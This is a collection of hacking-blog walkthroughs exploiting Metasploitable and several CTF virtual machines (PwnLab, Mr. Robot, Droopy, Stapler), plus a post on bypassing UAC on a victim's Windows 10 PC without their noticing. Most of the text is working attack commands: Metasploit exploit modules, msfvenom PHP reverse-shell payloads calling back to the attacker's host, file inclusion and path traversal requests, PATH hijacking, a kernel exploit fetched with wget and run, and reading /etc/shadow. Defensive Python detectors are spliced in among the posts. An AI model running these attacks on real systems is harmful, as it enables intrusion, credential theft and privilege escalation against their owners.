
Penetration Testing Skills Practice with Metasploitable (Beginner Guide)


Metasploitable is an intentionally vulnerable Ubuntu Linux virtual machine designed for testing security tools, demonstrating common vulnerabilities, conducting security training and practising common penetration testing techniques. The VM runs on any recent VMware product and on other virtualization platforms such as VirtualBox. You can download Metasploitable from https://www.vulnhub.com/entry/metasploitable-2,29/

Metasploitable is an exploitable target that helps us improve our skills and learn to turn every open port to our advantage. Ports and protocols are the foundation of hacking, so the more of them you understand, the more you can get out of a target.

In this article we will walk through the whole of Metasploitable, from installing it to hacking it step by step. We will take the vulnerable ports one by one and try to exploit them. First, download Metasploitable from the link above. When the download is complete, open VMware and click on Open a virtual machine.

Locate the VMware image of Metasploitable that you just downloaded and click on OK.

After clicking on OK, Metasploitable opens as a virtual machine; to run it, click on Power on this virtual machine.

As it starts it will ask you for a username and password. By default the username and password are msfadmin and msfadmin respectively. Once you enter them, Metasploitable will start.

Now that our vulnerable Linux machine is running, type the ifconfig command to get its IP address.

For penetration testing against Metasploitable, go to the terminal of your Kali Linux and scan the IP of Metasploitable with nmap so that we can see which ports are open. Type:

nmap -sV 192.168.1.106

From the nmap output we can see which ports are open and which service runs on each, so we can attack the vulnerable ports one by one. First we will attack vsftpd 2.3.4. We know this version is vulnerable, so let us exploit it. Open Metasploit and type:

search vsftpd 2.3.4

Typing the above command shows the exploits that help attack the said version. Then type:

use exploit/unix/ftp/vsftpd_234_backdoor

set rhost 192.168.1.106

set rport 21

exploit

Once the exploit has run, you land in a shell on Metasploitable and can proceed as you please.

Now we will exploit SSH, which runs on port 22. There is an existing module for this port; it performs a dictionary attack to crack the password of Metasploitable, and we use it as follows:

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.1.106

set rport 22

set user_file /root/Desktop/user.txt

set pass_file /root/Desktop/pass.txt

exploit

As you can see, once it runs it starts matching every username against the passwords to find the correct pair, and at the end you have the password along with the username.

Now we can use that password to reach the shell of Metasploitable. Go to the terminal of Kali and type:

ssh msfadmin@192.168.1.106

Here,

ssh –> is the service through which we log in

msfadmin –> is the user we log in as (its password, found above, is also msfadmin)

192.168.1.106 –> is the victim's IP address

On execution you will enter its shell.

Now we will attack via telnet, which runs on port 23. Here too we first find the password and then enter the shell. Type:

use auxiliary/scanner/telnet/telnet_login

set rhosts 192.168.1.106

set rport 23

set user_file /root/Desktop/user.txt

set pass_file /root/Desktop/pass.txt

exploit

As with SSH, it runs a dictionary attack and finds the correct password step by step. Now that you have the password, you can log on to Metasploitable:

telnet 192.168.1.106

After typing this, it asks you for the username and password; once you enter them you are in Metasploitable, as shown below:
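The ssh_login and telnet_login runs above are noisy on the target side: sshd writes one line per failed password to auth.log, so a burst of failures from one source followed by an accepted login is exactly the pattern a defender looks for. As an added example that is not part of the original post, here is a small Python detector over constructed auth.log lines; the log lines, the 2024 year used to parse timestamps and the 5-failures-in-60-seconds threshold are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# sshd password-auth lines in the default syslog format.
AUTH_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)

# Constructed sample: a dictionary attack from 192.168.1.105 that ends in a
# successful login, plus one ordinary typo-then-login from another host.
SAMPLE_AUTH_LOG = """\
Jan 10 10:00:01 metasploitable sshd[2201]: Failed password for invalid user admin from 192.168.1.105 port 40122 ssh2
Jan 10 10:00:02 metasploitable sshd[2203]: Failed password for invalid user admin from 192.168.1.105 port 40124 ssh2
Jan 10 10:00:02 metasploitable sshd[2205]: Failed password for msfadmin from 192.168.1.105 port 40126 ssh2
Jan 10 10:00:03 metasploitable sshd[2207]: Failed password for msfadmin from 192.168.1.105 port 40128 ssh2
Jan 10 10:00:03 metasploitable sshd[2209]: Failed password for msfadmin from 192.168.1.105 port 40130 ssh2
Jan 10 10:00:04 metasploitable sshd[2211]: Accepted password for msfadmin from 192.168.1.105 port 40132 ssh2
Jan 10 10:15:00 metasploitable sshd[2301]: Failed password for msfadmin from 192.168.1.50 port 51000 ssh2
Jan 10 10:30:00 metasploitable sshd[2302]: Accepted password for msfadmin from 192.168.1.50 port 51002 ssh2
"""


def parse_auth_log(text, year=2024):
    """Return (timestamp, result, user, src) tuples for password-auth events.

    syslog lines carry no year, so one is supplied (assumption: 2024)."""
    events = []
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if not m:
            continue  # unrelated sshd noise (session opened/closed, etc.)
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["src"]))
    return events


def detect_bruteforce(text, threshold=5, window_seconds=60):
    """One alert per source IP with >= threshold failed passwords inside a
    sliding window; the alert records whether a login then succeeded."""
    window = timedelta(seconds=window_seconds)
    by_src = defaultdict(list)
    for ev in parse_auth_log(text):
        by_src[ev[3]].append(ev)

    alerts = []
    for src, evs in by_src.items():
        evs.sort()
        fails = [e for e in evs if e[1] == "Failed"]
        best_end, best_count = None, 0
        # Slide a window starting at each failure and keep the densest one.
        for i, start in enumerate(fails):
            j = i
            while j + 1 < len(fails) and fails[j + 1][0] - start[0] <= window:
                j += 1
            count = j - i + 1
            if count >= threshold and count > best_count:
                best_end, best_count = fails[j], count
        if best_end is None:
            continue
        # An accepted password shortly after the burst means the guess worked.
        success = [
            e for e in evs
            if e[1] == "Accepted" and best_end[0] <= e[0] <= best_end[0] + window
        ]
        alerts.append({
            "src": src,
            "failures": best_count,
            "users": sorted({e[2] for e in fails}),
            "succeeded_as": success[0][2] if success else None,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```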

Now we will try to exploit port 80, on which the HTTP service runs. For this too there is a module in Metasploit; to use it, type:

use exploit/multi/http/php_cgi_arg_injection

set rhost 192.168.1.106

set rport 80

exploit

After execution you get a meterpreter session on Metasploitable, as shown.

Next we will exploit the Samba service running on port 139. For that we use the following exploit:

use exploit/multi/samba/usermap_script

set rhost 192.168.1.106

set rport 139

exploit

Running this gives you a shell session, meaning you reach the shell of Metasploitable.

Now, we will use the following exploit:

use exploit/multi/misc/java_rmi_server

set rhost 192.168.1.106

set rport 1099

exploit

Again, after you hit enter you will have a meterpreter session.

The next exploit is:

use exploit/linux/postgres/postgres_payload

set rhost 192.168.1.106

set rport 5432

exploit

Once the command is executed you will enter the meterpreter session as shown above.

The next exploit is related to UnrealIRCd; to search for it, type:

search Unreal ircd

The result lists the exploits that can attack the target. As you can see there are three, and we will use the latest one.

To use the exploit, type:

use exploit/unix/irc/unreal_ircd_3281_backdoor

set rhost 192.168.1.106

set rport 6667

exploit

When you hit enter you obtain a shell session, meaning you enter the shell of Metasploitable.

These are the attacks you can use against Metasploitable, and in the process you learn how a real target can be attacked through its different ports.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post Penetration Testing Skills Practice with Metasploitable (Beginner Guide) appeared first on Hacking Articles.


Penetration Testing in PwnLab (CTF Challenge)


In this article we will walk through a root2boot penetration testing challenge, PwnLab. PwnLab is a vulnerable framework based on the concept of CTF (capture the flag), with a bit of security that is a little complicated to bypass, but not impossible. So let us learn how we can get access to it.

Download From Here

To start, let us assume we do not know the IP of PwnLab, so we have to find it first. There is a command that shows all the IPs present in our network; go to the terminal of your Kali and type:

netdiscover

Target IP = 192.168.0.105

Knowing that, we start our penetration testing. First we scan with nmap; we use an aggressive scan as it gives detailed information and is fast. The command is:

nmap -A 192.168.0.105

We have the scan result and, as you can see, only three ports are open: 80, 111 and 3306.

Our target IP is 192.168.0.105, as its MAC vendor is VMware. That is our best guess, but to be sure let us check this IP in our browser; port 80 is open, so it should load. In the browser we see that PwnLab has three pages: home, login and upload. To get into the server we have to upload our code, and for that we need a username and password.

To find the username and password we will use nikto to discover the file that stores them. Nikto tells us the file names and what they contain. The command is:

nikto -h 192.168.0.105

As you can see, the entry "/config.php: PHP Config file may contain database IDs and passwords" points to the file holding the username and password. Now that we know the file name, we can use curl to read its contents.

cURL is a software project providing a library and a command-line tool for transferring data using various protocols. The project produces two products, libcurl and curl. It was first released in 1997; the name originally stood for "see URL".

The curl command is:

curl http://192.168.0.105/index.php?page=php://filter/convert.base64-encode/resource=config

The highlighted part in the above image is our result and contains the username and password. Note that it is base64 encoded, so we have to decode it to read it.

To decode it we will use HackBar. HackBar is a Firefox add-on with various functions; the most important one for us is that it encodes and decodes base64.

To decode, copy the string, go to HackBar and click on the Encoding option. A drop-down menu appears; select the Decode option.

A dialog box opens; paste the copied string into the text box and click on OK.

The decoded result appears in HackBar in readable form, and this way you have your username and password.

So, the username is root and password is H4u%QJ_H99.

Now we use the mysql command to view the usernames and passwords. The command is:

mysql -h 192.168.0.105 -u root -p Users

After typing the command it asks for the password; enter the decoded password and press enter.

You will then have the usernames and passwords; in this case the usernames are kent, mike and kane. The passwords are base64 encoded, so decode them with HackBar as before, as shown below:

And like this we have our passwords.

Now that we have a username and password, we need to create a PHP file to upload. We generate this raw file with msfvenom. The command is:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw

Once the file is generated, copy the code from <?php to die(); and paste it into a text file, then change its extension to .php.

If you try to upload this file you get the error "not allowed extension, please upload images only", so you need to change the extension of your .php file.

Before changing the extension, add GIF98 at the top of the code as shown below, then change the extension to .gif.

After changing the extension, the upload succeeds.
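The upload filter above trusts the file extension and the leading bytes, which is why a renamed PHP file with an image header gets through. As an added example that is not the lab's code, here is the check a defender would put behind an image upload in Python: it allow-lists the extension, requires the magic bytes to match that extension, rejects script extensions hidden inside the name and refuses any body that contains a PHP open tag. All sample files are constructed.

```python
import re

ALLOWED_EXTENSIONS = {"gif", "jpg", "jpeg", "png"}
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar"}

# Real file signatures for each allowed extension.
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# PHP open tags: <?php, the short echo tag <?= and a bare <? followed by space.
# If such a file is ever include()d by the application, this code runs.
PHP_TAG_RE = re.compile(rb"<\?(php\b|=|\s)", re.I)

# Constructed samples (not taken from the lab).
REAL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
            b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
POLYGLOT_GIF = b"GIF89a<?php echo 'inert sample'; ?>"  # image header glued onto PHP
WRONG_HEADER = b"GIF98<?php echo 'inert sample'; ?>"   # not a real GIF signature


def validate_image_upload(filename, data):
    """Return (ok, reason) for an uploaded image.

    Every check is independent of the others so that a file has to look like
    an image by name, by header and by content before it is accepted."""
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing extension"
    ext = parts[-1]
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext} not allowed"
    # shell.php.gif: the last extension is fine, but a server that maps
    # .php anywhere in the name to the interpreter would still execute it.
    if SCRIPT_EXTENSIONS & set(parts[1:-1]):
        return False, "script extension hidden in file name"
    if not data.startswith(MAGIC[ext]):
        return False, "magic bytes do not match extension"
    # A valid header does not prove a valid image: scan the whole body.
    if PHP_TAG_RE.search(data):
        return False, "PHP code embedded in image data"
    return True, "ok"


if __name__ == "__main__":
    for name, blob in [("avatar.gif", REAL_GIF), ("shell.gif", POLYGLOT_GIF),
                       ("shell.php.gif", REAL_GIF), ("x.gif", WRONG_HEADER)]:
        print(name, validate_image_upload(name, blob))
```

Storing the accepted file under a server-chosen name outside the web root, and serving it only through a handler that sets an image Content-Type, removes the remaining risk of the file ever being executed.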

Once the file is uploaded we still need a way to execute it. Right-click on the file and click on the Copy Image Location option.

Now that you have copied the image location, install Tamper Data. Tamper Data is a Firefox extension that lets you view, record and even modify outgoing HTTP requests; it helps you capture cookies and HTTP requests.

Open Tamper Data and click on Start Tamper.

A dialog box appears; click on the Tamper button in the right corner.

Another dialog box appears. Keep it open in the background and open Metasploit meanwhile.

After opening Metasploit, type:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Running the above commands helps you gain a meterpreter session from the lab.

Now go back to the Tamper Data dialog box that was open in the background. It has a Cookie option; in the text box next to it, delete whatever is written and type:

lang=../*Image location path*

Here,

*image location path* is the path of the file you uploaded and copied afterwards.

By doing so you make the application load your uploaded file through the lang cookie instead of its own code. The moment you click on OK, you will have your meterpreter session.
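Both the page=php://filter request and the lang=../ cookie above are local file inclusion indicators that a defender can pick straight out of the web server log. As an added example that is not part of the original post, here is a Python scanner over constructed access-log lines; it assumes the combined log format extended with the Cookie header as a final quoted field, and the IPs, timestamps and upload file name are made up.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format plus a trailing quoted Cookie field (assumed layout).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)

# PHP stream wrappers that turn an include() into a file read or code run.
WRAPPER_RE = re.compile(r"\b(php|data|expect|phar|zip|file)://", re.I)
# A ".." path component, with either slash style, anywhere in the value.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

# Constructed sample log: two benign requests and three inclusion attempts.
SAMPLE_ACCESS_LOG = [
    '192.168.0.106 - - [12/Mar/2017:10:01:02 +0000] "GET /index.php?page=login HTTP/1.1" '
    '200 1200 "-" "Mozilla/5.0" "lang=en"',
    '192.168.0.106 - - [12/Mar/2017:10:01:15 +0000] "GET /index.php?page=php://filter/'
    'convert.base64-encode/resource=config HTTP/1.1" 200 880 "-" "curl/7.52.1" "-"',
    '192.168.0.106 - - [12/Mar/2017:10:05:40 +0000] "GET /index.php HTTP/1.1" '
    '200 1300 "-" "Mozilla/5.0" "lang=../upload/3c0a2c8d.gif"',
    '192.168.0.106 - - [12/Mar/2017:10:06:00 +0000] "GET /index.php?page=php%3A%2F%2F'
    'filter%2Fresource%3Dconfig HTTP/1.1" 200 500 "-" "Mozilla/5.0" "-"',
    '192.168.0.106 - - [12/Mar/2017:10:07:00 +0000] "GET /images/logo.png HTTP/1.1" '
    '200 4000 "-" "Mozilla/5.0" "lang=fr"',
]


def suspicious_values(fields):
    """fields: iterable of (where, name, raw_value). Returns findings as
    (where, name, decoded_value, reason)."""
    findings = []
    for where, name, raw in fields:
        value = unquote(unquote(raw))  # two rounds also catch double-encoding
        if WRAPPER_RE.search(value):
            findings.append((where, name, value, "php stream wrapper"))
        elif TRAVERSAL_RE.search(value):
            findings.append((where, name, value, "path traversal"))
    return findings


def scan_line(line):
    """Parse one log line and inspect every query parameter and cookie."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m["target"]).query
    fields = [("query", k, v) for k, v in parse_qsl(query, keep_blank_values=True)]
    if m["cookie"] != "-":
        for pair in m["cookie"].split(";"):
            name, _, value = pair.strip().partition("=")
            fields.append(("cookie", name, value))
    return {"src": m["src"], "ts": m["ts"], "target": m["target"],
            "findings": suspicious_values(fields)}


def scan_log(lines):
    """Return only the parsed lines that carry at least one finding."""
    return [r for r in map(scan_line, lines) if r and r["findings"]]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_ACCESS_LOG):
        print(hit["ts"], hit["src"], hit["findings"])
```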

But this is not enough, as we still need root. If you go to the shell of the lab and try to switch user, the command shows an error. To gain full access to PwnLab you still need a few more commands, so type:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

Executing these gives you a proper terminal inside PwnLab, and if you try to switch user now you will succeed. The command to switch user is:

su kane

iSv5Ym2GRo

Here,

su –> denotes the switch user

kane –> the user you want to switch to

iSv5Ym2GRo –> is the password

After executing it, you are the user kane.

Next, if you type the ls command you will see there is a folder named home. We go into that folder; type:

cd home

As you have entered the home folder, type:

ls -lsa

This command shows all the users in home with their details. Now that you know how many users there are and what their usernames are, go back to the kane user; type:

cd kane (this command takes you back into kane's directory)

ls -lsa (this command lists everything present in kane's directory)

As you can see in the image below, there is a file in kane's directory called msgmike. Let us try to run it; type:

./msgmike

If you run it, it gives an error saying that no such file exists. So let us change user and see whether we can open this file from another user; type:

cd ..

cd kent

cd mike

You can see that permission is denied for every other user. So now type:

echo "/bin/bash" > cat

chmod 777 cat

With the above commands we create a file named cat containing /bin/bash (the real cat command creates single or multiple files, views file contents, concatenates files and redirects output to the terminal or to files). After creating the file we make it executable with chmod.

Then further type:

export PATH=.:$PATH

./msgmike

Once the above commands are executed, msgmike runs our fake cat and we become the other user, mike, as we wanted. Now if you type:

id

You will see that the command shows the user and group ids you now hold.

Now that you are the user mike, open the home folder and then go into the mike folder. Then type:

./msg2root

test; /bin/sh

id (this command shows your user and group ids)

whoami (this command tells you that you are root)

ls (lists the files in the root directory)

cat flag.txt (this command reads flag.txt, which was our main objective)

This was an excellent challenge. It required us to think outside the box, correlate findings and manually validate vulnerabilities. It is a good example of the importance of manual methods, as no automated vulnerability scanner would have disclosed the flaws found here. The challenge also demonstrates the importance of validating user input.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post Penetration Testing in PwnLab (CTF Challenge) appeared first on Hacking Articles.

Hack the Mr. Robot VM (CTF Challenge)


This is another of our root2boot penetration testing challenge articles. We will walk through an exploitable framework, Mr. Robot. Based on the TV show of the same name, it has three keys hidden in different locations, and the main goal is to find all three. Each key is progressively harder to find. Breaking in is not too difficult: there is no advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

First Download the Mr Robot Lab from here

First of all we have to find its IP address; go to the terminal of your Kali and type:

netdiscover

Executing the above command shows all the IP addresses in our network. Our target IP is 192.168.0.102; let us scan it.

To scan our target IP we will use an aggressive scan (-A):

nmap -A 192.168.0.102

The scan result shows that the open ports are 22, 80 and 443. As port 80 is open, we can try to open this IP in our browser.

And yes, it opens which further confirms our target.

Next we will run nikto against it. Nikto helps us gather information such as its files and the other major things we ought to know about our target. Type:

nikto -h 192.168.0.102

From the result we gather that there is a text file named robots.txt which might give us further information. Let us open this file in the browser.

Opening the key-1-of-3.txt file listed there gives us the first of the 3 keys mentioned in the readme.


robots.txt also lists fsocity.dic, a dictionary file. Let us open this dictionary file in the browser as well.

When we open the dictionary file in the browser, it asks us to download it. We downloaded and opened it; it is a file that may contain usernames and passwords.

Now that we may have usernames and passwords, we try to log on to our target. We tried the usernames one by one and each gave the error that the username does not exist, but when we used the name elliot it said the password is incorrect.

With this we know for sure that elliot is a valid username, and now we just have to find its password.

Our best guess is that the password is in the same dictionary file from which we found the username. So we will use WPScan with that file to find it. Open a terminal in Kali and type:

ruby ./wpscan.rb --url http://192.168.0.102 --wordlist /root/Desktop/fsocity.dic --username elliot

Here,

./wpscan.rb –> starts WPScan

--url –> denotes the URL on which WPScan will work

http://192.168.0.102 –> is our URL

--wordlist –> denotes the path of the dictionary file

--username –> denotes the username

elliot –> the username

Once the command starts it will take time to run, as the dictionary file is huge. So sit back and let WPScan do its work.

When execution completes (which may take a long time; in our case it took almost 4 hours) you will have the password for the username elliot, which is ER28-0652.

Using the password, log on to the target.

Once you have logged in, make the malicious file that you will upload. Generate the code with msfvenom:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw

Copy the code from <?php to die(); and paste it into a theme template (and save it).

With access to the WordPress admin console, one way in is to replace one of the theme templates with PHP of your own. We went for a reverse shell by editing the 404.php template and replacing its contents with the msfvenom-generated shell.

Simultaneously open Metasploit and type:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Once the handler is running, open the path of the template in the browser as shown:

Browse to http://192.168.0.102/wp-content/themes/twentyfifteen/404.php and press enter.

Once you open the template path in the browser you will have a meterpreter session; go to the shell and type:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

After doing the above you have a proper shell as a user on our target; to learn about it type:

ls -lsa (lists the current directory with details)

cd home (takes us into the home folder)

ls -lsa (lists the home folder)

cd robot (takes us into the robot folder)

Now, to see what the robot folder contains, type:

ls -lsa

We now know there are two important files: one is a text file, the other is a password in the form of an MD5 hash. If we try to open the text file by typing:

cat key-2-of-3.txt

It will not open, as we do not have permission to read it. But let us try to open the MD5 file; type:

cat password.raw-md5

Executing the above command gives the MD5 value (hash) of the password, as you can see below:

We will use md5cracker.org (an online MD5 cracker) to crack this hash. Enter the MD5 value in the text box and click on the crack/encrypt button.

The value translates to abcdefghijklmnopqrstuvwxyz, as shown below.

Now, in the terminal, try to switch to the user robot with the command:

su robot

It will ask you for the password. Enter the cracked password and you become the robot user; to see its files, type:

ls -lsa

Now, try to open the remaining text file by typing :

cat key-2-of-3.txt

Here we read the second key file.

Next type the following :

nmap

Older versions of Nmap supported an option called "interactive". With this option, users could execute shell commands from an nmap "shell" (interactive shell).

nmap --interactive

With the above command you enter the nmap shell; then type:

!sh

id (shows our user and group ids)

cd /root (takes you into root's home directory)

Once you have entered /root, type:

ls -lsa

cat key-3-of-3.txt

Executing these gives us the third of the 3 keys, completing Mr. Robot. There are many ways to do the above, but this method is the easiest. We hope you find it effective and interesting and that it helps you improve.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post Hack the Mr. Robot VM (CTF Challenge) appeared first on Hacking Articles.

Hack Admin Access of Remote Windows 10 PC using TpmInit UACBypass


Microsoft keeps increasing Windows security with each release, and with that it is getting harder and harder to hack. It is often said "where there is a will, there is a way", so thankfully it is not impossible. Once you have hacked into a Windows 10 PC, it is difficult to gain administrator access without making your victim suspicious. Therefore, we present a new way to do so.

Follow the steps below and you will learn how to gain administrator access to a Windows 10 PC without arousing the victim's suspicion.

First of all, to learn how to hack the victim's PC, click here.

Once you have hacked it and gained a meterpreter session, type:

getsystem

This command confirms that you are not yet administrator. There is no need to worry: just download the TpmInit file from here.

Now upload the file to the victim's PC by typing:

upload /root/Desktop/TpmInitUACBypass.exe d:\\

Here,

upload –> is used to upload a file

/root/Desktop/TpmInitUACBypass.exe –> is the path of the file to upload

d:\\ –> is the location on the victim's PC where the file will be placed

While the file uploads, open Metasploit in another window and type:

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 443

exploit

Once this handler is running, go to the meterpreter session you already had and type:

shell

Typing shell takes you to the command shell of the PC. Now type:

d: (This command takes you into the D drive of the victim's PC, i.e. where you uploaded your file)

TpmInitUACBypass.exe 192.168.0.106 msf (This command executes your uploaded file)

As the command executes our file, we get a session with administrator privileges, as shown.

This way it is quite easy to bypass UAC and gain administrator access in Windows 10. Thus, nothing is impossible in hacking.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post Hack Admin Access of Remote Windows 10 PC using TpmInit UACBypass appeared first on Hacking Articles.

Hack the Droopy VM (CTF Challenge)


In this article we will complete a root2boot challenge from the Capture the Flag series. This is a walkthrough of Droopy, which is a vulnerable framework but also a little bit complex. Download it from here.

Walkthrough

Let us start by scanning the network to find the IP of our target. To scan the network, type the following:

netdiscover

Our target IP is 192.168.1.103. Now that we know our target, let us scan it; type:

nmap -A 192.168.1.103

From the scan we gather that port 80 is open and that it runs Drupal version 7, which is known for its vulnerabilities. So let us exploit it to get a meterpreter session. Open Metasploit and type:

search drupal

Searching for drupal lists the various exploits. From these we use the drupal_drupageddon exploit. Now type:

use exploit/multi/http/drupal_drupageddon

set rhost 192.168.1.103 (IP of the remote host)

set rport 80

exploit

Upon execution of the above exploit you will have a meterpreter session. Once you have it, type the following commands; they give you a proper shell and better visibility of the path you are in:

shell

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

Using the above commands we have entered the terminal. Our next step is to find the Ubuntu version of the target. To find it, type:

lsb_release -a

We now know that our target is running Ubuntu 14.04. Let us search for an exploit for it on exploit-db.com. Our search is successful and we have found a suitable exploit, as shown below:

We also know that this exploit is not available in Metasploit, as the site below shows:

To download the exploit we need a directory on the target that we can write to and run scripts from. To find such directories:

find / -writable -type d 2>/dev/null

cd /tmp/ (takes us into the /tmp folder)

wget https://www.exploit-db.com/download/37292 (downloads the exploit)

Now we rename the downloaded file, compile it and run it to gain root. The commands are:

mv 37292 37292.c (renames the file)

gcc 37292.c -o kernel (compiles the file and saves the output as kernel)

chmod 777 kernel (makes the file executable)

./kernel (runs the file)

After executing the above commands we are root. To confirm it, let us try a few commands:

whoami (this command tells you that you are root)

cd /root (takes us into the /root folder)

ls (lists all the files present in the root folder)

We have found a file named dave.tc. If we open it in the browser it will be offered for download, so let's get it that way. We can easily reach /var/www/html from the web front end, so let's copy dave.tc there:

cp dave.tc /var/www/html

Let's open the file with VeraCrypt, the software that mounts the container so that you can open it. Download it from https://veracrypt.codeplex.com/wikipage?title=Downloads

When you open VeraCrypt, select slot 1 so that it mounts the container as disk 1.

When you try to mount it, it asks for a password. We don't have the password, so let us explore and find it.

First let us look at the file containing all the hash values. We know the hashes are in the shadow file, and to read it the command is:

cat /etc/shadow

We have the hash of root. Now let us check which hash algorithm was used; we use an online hash identifier for that. Search Google for "online hash identifier".

We used onlinehashcrack.com. Copy and paste the hash into the site; the result shows that SHA512 was used.

While exploring we also found a mail. Let us read it; type:

cat /var/mail/www-data

Reading the mail we know two things for sure:

  • the password is 11 characters long
  • the password is related to academy

To find our password we first run a command that filters the rockyou.txt wordlist. We strongly suggest filtering it, as it contains 8M passwords; running the whole file as it is would take all day. So we filter on the conditions that the words are 11 characters long, lowercase and contain the word academy.

(Reference: https://kaizensecurity.wordpress.com/2016/04/29/droopy-v0-2-solution/)

To do so, the command is:

awk 'length($1) == 11 { print $1 }' /usr/share/wordlists/rockyou.txt | egrep '^[[:lower:]]+academy' > /root/Desktop/pass.txt

Now that we have our filtered wordlist, we find the password using truecrack. The command is:

truecrack --truecrypt /root/Download/dave.tc -k SHA512 -w /root/Desktop/pass.txt

Using the above command you will have your password in minutes. Now that we have the password, we mount the container in VeraCrypt again. Follow the same procedure as earlier, enter the password and tick the TrueCrypt mode box.

When you click on OK you will have the mounted drive on your desktop.

Open the drive by double clicking on it, go to .secret and then open .top; at last you will have flag.txt.

VOILA!! You have achieved the flag!!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post Hack the Droopy VM (CTF Challenge) appeared first on Hacking Articles.

Hack the Stapler VM (CTF Challenge)


In this article we will try to attack and gain root access to the Stapler: 1 challenge from VulnHub. The goal is reconnaissance, enumeration and exploitation of this vulnerable machine to get root access and read the contents of flag.txt. We have been told there are various methods to do so, but we have tried and found the simplest way.

Download the stapler vm from here

WalkThrough

Start by scanning the network to find our target. The command for it is:

netdiscover

We found our target –> 192.168.1.105

To scan our target we will use Sparta. Sparta combines nmap scanning and Nikto, which makes our work simpler. To open Sparta: Kali Linux > Applications > Information Gathering > Sparta. After opening Sparta, click where it says "click here to add host to scope". A dialog box asks for the target's IP; enter it and click on Add to scope.

Once Sparta starts working, it shows all the open ports on our target.

The result shows that ports 21, 22, 53, 80, 137, 139, 666, 3306 and 12380 are open. The Nikto tab for port 80 shows that we can open our target IP in a browser, and that /.bashrc and /.profile are files which may contain useful information.

First we open our target IP in the browser to see if we find anything.

As you can see, we find nothing on opening the target IP in the browser. So we tried the two files found with Nikto; opening each prompts a file download. No harm in that, so we downloaded them.

We regretted it, as there was nothing in either file. So we explored more of what Nikto had to offer and found that we could try port 21, which runs FTP. Nikto took the liberty of running hydra and found the FTP username and password, which are ftp and password respectively.

Now that we had a username and password, we tried them from the terminal of Kali by typing:

ftp 192.168.1.105

ftp (username)

password (password)

And again we found nothing in it. Similarly, we tried to exploit port numbers 22, 139 and 666 respectively. Alas! We found nothing. Again!

So we decided to explore Nikto more and found that there was a robots.txt file on port 12380 with two entries. We also noticed that the site had SSL enabled, which meant it would only open with the https:// prefix.

So first we tried opening it in the browser on port 12380.

Finally, something happened! The site opened on port 12380. Then we tried to open robots.txt (https://192.168.1.105/robots.txt) and found two entries, i.e. /admin112233/ and /blogblog/

We opened them one by one; only /blogblog/ proved useful, as a blog opened there.

Studying this blog we established that it is built on WordPress, so obviously we use WPScan to find out all about it. We have come up with a 3-in-1 command that tells us about the themes and plug-ins as well as the usernames:

wpscan --url https://192.168.1.105/blogblog/ --enumerate ap --enumerate at --enumerate u

WPScan has also informed us about the uploads directory, as highlighted in the image above.

Completing the scan, we found one plug-in, the Advanced Video plug-in. We searched for an exploit for it on www.exploit-db.com and found one.

Reading through the exploit we found the correct URL to request and use to our advantage:

http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILE PATH]

We adapted the URL to our target:

http://192.168.1.105/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php

When the adapted URL is requested it shows an error, but if you pay attention you will notice a change on the WordPress blog.

It gives us an image. We already know where the uploads directory is (from WPScan), so we can go there directly to view or download the image. For this our URL will be:

https://192.168.1.105/blogblog/wp-content

Now if we try to open or download this image it will show an error, as below:

The trick here is to download the image file without any extension. Run the following command to read the image:

cat 1439829871

This provides us with the MySQL username and password. To enter the MySQL database we will use a third-party tool called HeidiSQL_9.3_Portable.

